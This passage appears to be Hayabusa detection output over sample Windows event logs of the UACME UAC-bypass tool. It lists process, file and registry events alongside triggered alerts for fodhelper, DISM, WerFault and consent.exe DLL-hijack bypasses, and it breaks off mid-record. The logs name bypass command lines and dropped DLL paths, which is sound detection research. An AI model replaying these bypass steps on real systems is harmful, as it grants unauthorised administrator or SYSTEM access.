Escalation/Sysmon_UACME_33.evtx +2019-08-03 19:14:08.065 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\fodhelper.exe"" | Process: C:\Windows\System32\fodhelper.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: UACME.exe 33 | LID: 0x18d3b3 | PID: 8180 | PGUID: 747F3D96-5E6F-5D45-0000-001014CA9D00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx +2019-08-03 19:14:08.472 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\fodhelper.exe"" | LID: 0x18d3b3 | PID: 3656 | PGUID: 747F3D96-5E70-5D45-0000-0010FCDD9D00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx +2019-08-03 19:14:08.472 +09:00,MSEDGEWIN10,1,high,PrivEsc,Bypass UAC via Fodhelper.exe,,../hayabusa-rules/sigma/process_creation/proc_creation_win_uac_fodhelper.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx +2019-08-03 19:14:08.681 +09:00,MSEDGEWIN10,12,medium,,Registry Key Create/Delete_Sysmon Alert,PrivEsc - UAC bypass UACME-33 | DeleteKey: HKU\S-1-5-21-3461203602-4096304019-2269080069-1000_Classes\ms-settings\shell\open\command | Process: C:\Windows\explorer.exe | PID: 4440 | PGUID: 747F3D96-5E6A-5D45-0000-001076639D00,../hayabusa-rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx +2019-08-03 19:14:08.681 +09:00,MSEDGEWIN10,12,medium,Evas,Removal of Potential COM Hijacking Registry Keys,,../hayabusa-rules/sigma/registry_event/sysmon_removal_com_hijacking_registry_key.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx +2019-08-03 19:14:08.799 +09:00,MSEDGEWIN10,5,info,,Process 
Terminated,Process: C:\Users\IEUser\Desktop\UACME.exe | PID: 4440 | PGUID: 747F3D96-5E6A-5D45-0000-001076639D00,../hayabusa-rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx +2019-08-03 19:51:46.511 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: UACME.exe 32 | Process: C:\Users\IEUser\Desktop\UACME.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x18d3fb | PID: 6380 | PGUID: 747F3D96-6742-5D45-0000-00104A66B500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_32.evtx +2019-08-03 19:51:46.511 +09:00,MSEDGEWIN10,1,high,Evas | PrivEsc,UAC Bypass Tool UACMe,,../hayabusa-rules/sigma/process_creation/proc_creation_win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_32.evtx +2019-08-03 19:51:46.511 +09:00,MSEDGEWIN10,1,low,Exec,Process Start From Suspicious Folder,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_32.evtx +2019-08-03 19:51:46.647 +09:00,MSEDGEWIN10,11,medium,,File Created_Sysmon Alert,PrivEsc - UAC Bypass UACME 32 | Path: C:\Users\IEUser\AppData\Local\Temp\OskSupport.dll | Process: C:\Windows\explorer.exe | PID: 6380 | PGUID: 747F3D96-6742-5D45-0000-00104A66B500,../hayabusa-rules/hayabusa/sysmon/alerts/11_FileCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_32.evtx +2019-08-03 19:51:46.647 +09:00,MSEDGEWIN10,11,high,Evas | PrivEsc,UAC Bypass Using Windows Media Player - File,,../hayabusa-rules/sigma/file_event/file_event_uac_bypass_wmp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_32.evtx +2019-08-03 19:51:46.647 +09:00,MSEDGEWIN10,11,medium,,Rename Common File to DLL 
File,,../hayabusa-rules/sigma/etw/file_rename/file_rename_win_not_dll_to_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_32.evtx +2019-08-03 19:51:46.685 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 272 0000028064421EA0 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 8160 | PGUID: 747F3D96-6742-5D45-0000-00102A72B500,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_32.evtx +2019-08-03 19:51:47.219 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 272 0000028064425400 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 324 | PGUID: 747F3D96-6743-5D45-0000-0010DAA8B500,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_32.evtx +2019-08-03 19:51:48.431 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: C:\windows\system32\cmd.exe ""C:\Program Files\Windows Media Player\osk.exe"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: UACME.exe 32 | LID: 0x18d3fb | PID: 6456 | PGUID: 747F3D96-6743-5D45-0000-001068D7B500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_32.evtx +2019-08-03 19:51:48.675 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\eventvwr.exe"" | Process: C:\Windows\System32\eventvwr.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: UACME.exe 32 | LID: 0x18d3fb | PID: 5840 | PGUID: 747F3D96-6744-5D45-0000-00108BE4B500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege 
Escalation/Sysmon_UACME_32.evtx +2019-08-03 19:51:48.696 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 318 0000028064425400 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 5124 | PGUID: 747F3D96-6744-5D45-0000-00102FE6B500,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_32.evtx +2019-08-03 19:51:49.371 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\eventvwr.exe"" | Process: C:\Windows\System32\eventvwr.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: UACME.exe 32 | LID: 0x18d3b3 | PID: 5524 | PGUID: 747F3D96-6744-5D45-0000-0010040CB600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_32.evtx +2019-08-03 20:23:15.364 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: UACME.exe 30 | Process: C:\Users\IEUser\Desktop\UACME.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x18d3fb | PID: 7984 | PGUID: 747F3D96-6EA3-5D45-0000-0010204DE100",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_30.evtx +2019-08-03 20:23:15.364 +09:00,MSEDGEWIN10,1,high,Evas | PrivEsc,UAC Bypass Tool UACMe,,../hayabusa-rules/sigma/process_creation/proc_creation_win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_30.evtx +2019-08-03 20:23:15.364 +09:00,MSEDGEWIN10,1,low,Exec,Process Start From Suspicious Folder,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_30.evtx +2019-08-03 20:23:15.560 +09:00,MSEDGEWIN10,11,medium,,File Created_Sysmon Alert,PrivEsc - UAC Bypass UACME 30 | Path: 
C:\Users\IEUser\AppData\Local\Temp\wow64log.dll | Process: C:\Windows\explorer.exe | PID: 7984 | PGUID: 747F3D96-6EA3-5D45-0000-0010204DE100,../hayabusa-rules/hayabusa/sysmon/alerts/11_FileCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_30.evtx +2019-08-03 20:23:15.560 +09:00,MSEDGEWIN10,11,medium,,Rename Common File to DLL File,,../hayabusa-rules/sigma/etw/file_rename/file_rename_win_not_dll_to_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_30.evtx +2019-08-03 20:23:15.579 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 272 0000028064427C00 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 3640 | PGUID: 747F3D96-6EA3-5D45-0000-0010FB58E100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_30.evtx +2019-08-03 20:23:17.433 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\syswow64\wusa.exe"" | Process: C:\Windows\SysWOW64\wusa.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: UACME.exe 30 | LID: 0x18d3fb | PID: 3340 | PGUID: 747F3D96-6EA4-5D45-0000-0010DD92E100",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_30.evtx +2019-08-03 20:23:17.541 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 294 0000028064427C00 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 6292 | PGUID: 747F3D96-6EA5-5D45-0000-0010E19FE100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_30.evtx +2019-08-03 20:23:18.619 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: 
""C:\Windows\syswow64\wusa.exe"" | Process: C:\Windows\SysWOW64\wusa.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: UACME.exe 30 | LID: 0x18d3b3 | PID: 6312 | PGUID: 747F3D96-6EA5-5D45-0000-0010C5C4E100",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_30.evtx +2019-08-03 20:23:18.666 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"PrivEsc - DLL Hijack - UACME 30 | Image: C:\Windows\System32\wow64log.dll | Process: C:\Windows\SysWOW64\WerFault.exe | Company: Hazardous Environments | Signed: false | Signature: Unavailable | PID: 932 | PGUID: 747F3D96-6EA5-5D45-0000-00107AC9E100 | Hash: SHA1=F26AD3298954CE6C5D01DC0ACC2B4A516554B430,MD5=7B97BFB44F4B8163AC336B0C85F62763,SHA256=5B08DFA2FA7CC474632485F1EC66CDCC0EEC9560C3630C1A8588EE345153209D,IMPHASH=3432208F552ABE01A0293828CD0796BE",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_30.evtx +2019-08-03 20:23:18.694 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 6312 -ip 6312 | LID: 0x3e7 | PID: 6068 | PGUID: 747F3D96-6EA5-5D45-0000-001032CCE100",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_30.evtx +2019-08-03 20:23:18.715 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: C:\Windows\SysWOW64\WerFault.exe -u -p 6312 -s 80 | Process: C:\Windows\SysWOW64\WerFault.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\syswow64\wusa.exe"" | LID: 0x18d3b3 | PID: 4348 | PGUID: 747F3D96-6EA5-5D45-0000-00107CCEE100",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_30.evtx +2019-08-03 20:23:18.803 
+09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"PrivEsc - DLL Hijack - UACME 30 | Image: C:\Windows\System32\wow64log.dll | Process: C:\Windows\SysWOW64\WerFault.exe | Company: Hazardous Environments | Signed: false | Signature: Unavailable | PID: 4768 | PGUID: 747F3D96-6EA5-5D45-0000-0010EED0E100 | Hash: SHA1=F26AD3298954CE6C5D01DC0ACC2B4A516554B430,MD5=7B97BFB44F4B8163AC336B0C85F62763,SHA256=5B08DFA2FA7CC474632485F1EC66CDCC0EEC9560C3630C1A8588EE345153209D,IMPHASH=3432208F552ABE01A0293828CD0796BE",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_30.evtx +2019-08-03 20:23:18.824 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 4348 -ip 4348 | LID: 0x3e7 | PID: 7844 | PGUID: 747F3D96-6EA5-5D45-0000-00108FD3E100",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_30.evtx +2019-08-03 21:06:53.680 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: UACME.exe 23 | Process: C:\Users\IEUser\Desktop\UACME.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x18d3fb | PID: 5080 | PGUID: 747F3D96-78DD-5D45-0000-0010B8A50301",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_23.evtx +2019-08-03 21:06:53.680 +09:00,MSEDGEWIN10,1,high,Evas | PrivEsc,UAC Bypass Tool UACMe,,../hayabusa-rules/sigma/process_creation/proc_creation_win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_23.evtx +2019-08-03 21:06:53.680 +09:00,MSEDGEWIN10,1,low,Exec,Process Start From Suspicious 
Folder,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_23.evtx +2019-08-03 21:06:53.933 +09:00,MSEDGEWIN10,11,medium,,File Created_Sysmon Alert,PrivEsc - UAC Bypass UACME 23 | Path: C:\Users\IEUser\AppData\Local\Temp\dismcore.dll | Process: C:\Windows\explorer.exe | PID: 5080 | PGUID: 747F3D96-78DD-5D45-0000-0010B8A50301,../hayabusa-rules/hayabusa/sysmon/alerts/11_FileCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_23.evtx +2019-08-03 21:06:53.933 +09:00,MSEDGEWIN10,11,medium,,Rename Common File to DLL File,,../hayabusa-rules/sigma/etw/file_rename/file_rename_win_not_dll_to_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_23.evtx +2019-08-03 21:06:53.943 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 272 00000280644BCAF0 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 7560 | PGUID: 747F3D96-78DD-5D45-0000-0010B7B10301,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_23.evtx +2019-08-03 21:06:54.900 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\pkgmgr.exe"" /n:C:\Users\IEUser\AppData\Local\Temp\oemsetup.xml | Process: C:\Windows\System32\PkgMgr.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: UACME.exe 23 | LID: 0x18d3fb | PID: 3876 | PGUID: 747F3D96-78DE-5D45-0000-0010B3F60301",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_23.evtx +2019-08-03 21:06:54.972 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 406 000002806444C740 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: 
C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 2040 | PGUID: 747F3D96-78DE-5D45-0000-0010FFFE0301,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_23.evtx +2019-08-03 21:06:55.455 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\pkgmgr.exe"" /n:C:\Users\IEUser\AppData\Local\Temp\oemsetup.xml | Process: C:\Windows\System32\PkgMgr.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: UACME.exe 23 | LID: 0x18d3b3 | PID: 216 | PGUID: 747F3D96-78DF-5D45-0000-0010622F0401",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_23.evtx +2019-08-03 21:06:55.620 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\dism.exe"" /online /norestart /apply-unattend:""C:\Users\IEUser\AppData\Local\Temp\oemsetup.xml"" | Process: C:\Windows\System32\Dism.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\pkgmgr.exe"" /n:C:\Users\IEUser\AppData\Local\Temp\oemsetup.xml | LID: 0x18d3b3 | PID: 5756 | PGUID: 747F3D96-78DF-5D45-0000-0010BD350401",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_23.evtx +2019-08-03 21:06:55.620 +09:00,MSEDGEWIN10,1,high,Evas | PrivEsc,UAC Bypass Using PkgMgr and DISM,,../hayabusa-rules/sigma/process_creation/proc_creation_win_uac_bypass_pkgmgr_dism.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_23.evtx +2019-08-03 21:06:55.820 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\dism.exe"" /online /norestart /apply-unattend:""C:\Users\IEUser\AppData\Local\Temp\oemsetup.xml"" | LID: 0x18d3b3 | PID: 4320 | PGUID: 
747F3D96-78DF-5D45-0000-0010EF400401",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_23.evtx +2019-08-03 21:08:13.636 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: UACME.exe 22 | Process: C:\Users\IEUser\Desktop\UACME.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x18d3fb | PID: 5336 | PGUID: 747F3D96-792D-5D45-0000-00104F190601",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx +2019-08-03 21:08:13.636 +09:00,MSEDGEWIN10,1,high,Evas | PrivEsc,UAC Bypass Tool UACMe,,../hayabusa-rules/sigma/process_creation/proc_creation_win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx +2019-08-03 21:08:13.636 +09:00,MSEDGEWIN10,1,low,Exec,Process Start From Suspicious Folder,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx +2019-08-03 21:08:13.818 +09:00,MSEDGEWIN10,11,medium,,File Created_Sysmon Alert,PrivEsc - UAC Bypass UACME 22 | Path: C:\Users\IEUser\AppData\Local\Temp\comctl32.dll | Process: C:\Windows\explorer.exe | PID: 5336 | PGUID: 747F3D96-792D-5D45-0000-00104F190601,../hayabusa-rules/hayabusa/sysmon/alerts/11_FileCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx +2019-08-03 21:08:13.818 +09:00,MSEDGEWIN10,11,medium,,Rename Common File to DLL File,,../hayabusa-rules/sigma/etw/file_rename/file_rename_win_not_dll_to_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx +2019-08-03 21:08:13.874 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 272 00000280644BC3D0 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: 
C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 7472 | PGUID: 747F3D96-792D-5D45-0000-00107A250601,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx +2019-08-03 21:08:14.372 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 272 00000280644BC9C0 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 6716 | PGUID: 747F3D96-792E-5D45-0000-001001560601,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx +2019-08-03 21:08:14.977 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 272 00000280644BC890 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 8072 | PGUID: 747F3D96-792E-5D45-0000-00104A760601,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx +2019-08-03 21:08:15.664 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 272 00000280644BC170 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 2388 | PGUID: 747F3D96-792F-5D45-0000-00103DA80601,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx +2019-08-03 21:08:16.721 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\eventvwr.exe"" | Process: C:\Windows\System32\eventvwr.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: UACME.exe 22 | LID: 0x18d3fb | PID: 4604 | PGUID: 
747F3D96-7930-5D45-0000-001027DC0601",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx +2019-08-03 21:08:16.753 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 318 0000028064471300 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 4740 | PGUID: 747F3D96-7930-5D45-0000-001055DE0601,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx +2019-08-03 21:08:16.853 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\WerFault.exe -u -p 4740 -s 128 | Process: C:\Windows\System32\WerFault.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: consent.exe 896 318 0000028064471300 | LID: 0x3e7 | PID: 6388 | PGUID: 747F3D96-7930-5D45-0000-001085EE0601,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx +2019-08-03 21:08:16.853 +09:00,MSEDGEWIN10,1,high,Evas | PrivEsc,UAC Bypass Using Consent and Comctl32 - Process,,../hayabusa-rules/sigma/process_creation/proc_creation_win_uac_bypass_consent_comctl32.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx +2019-08-03 21:08:19.888 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"PrivEsc - DLL Hijack - UACME 22 | Image: C:\Windows\System32\consent.exe.local\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17763.615_none_05b4414a072024d4\comctl32.dll | Process: C:\Windows\System32\consent.exe | Company: Hazardous Environments | Signed: false | Signature: Unavailable | PID: 4740 | PGUID: 747F3D96-7930-5D45-0000-001055DE0601 | Hash: 
